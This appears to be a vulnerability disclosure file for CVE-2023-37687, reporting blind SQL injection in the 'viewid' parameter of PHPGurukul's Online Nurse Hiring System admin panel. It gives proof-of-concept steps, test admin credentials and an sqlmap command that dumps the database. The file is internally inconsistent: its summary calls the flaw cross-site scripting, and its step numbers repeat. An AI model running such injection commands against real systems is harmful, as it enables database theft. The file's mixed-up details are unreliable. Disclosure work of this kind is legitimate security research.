-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2023-37687.txt
70 lines (70 loc) · 1.94 KB
/
CVE-2023-37687.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
> [Suggested description]
> Online Nurse Hiring System v1.0 was discovered to contain a cross-site
> scripting (XSS) vulnerability in the View Request of Nurse Page in the
> Admin portal.
>
> ------------------------------------------
>
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> PHPGURUKUL
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Online Nurse Hiring System - v1.0
>
> ------------------------------------------
>
> [Affected Component]
> View Request of Nurse in Admin portal
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Blind SQLi
> # Description #
>
> Online Nurse Hiring System v1.0 is vulnerable to Blind SQL Injection in the admin panel 'viewid' field because of insufficient user supplied data sanitization.
>
> # Proof of Concept (PoC) : Exploit #
>
> 1) Goto: http://localhost/onhs/admin/index.php
> 2) Login as admin using test credentials: admin/Test@123
> 3) Goto: http://localhost/onhs/admin/view-request.php?viewid=2
> 4) Enter ' at the end of viewid parameter.
> 5) You will see blank page, hence vulnerable to Blind Sql Injection.
> 6) Copy the cookie value in order to run in sqlmap command.
> 4) Run the sqlmap command:
> sqlmap -u 'http://192.168.29.14:8080/onhs/admin/view-request.php?viewid=2%27' --cookie='PHPSESSID=pgk23oqtkrh9tarl3kbamhk0gc' --dump
> 5) All the results of database is shown ==> SQL Injection success
>
> ------------------------------------------
>
> [Discoverer]
> ROHIT TIWARI
>
> ------------------------------------------
>
> [Reference]
> http://online.com
> http://phpgurukul.com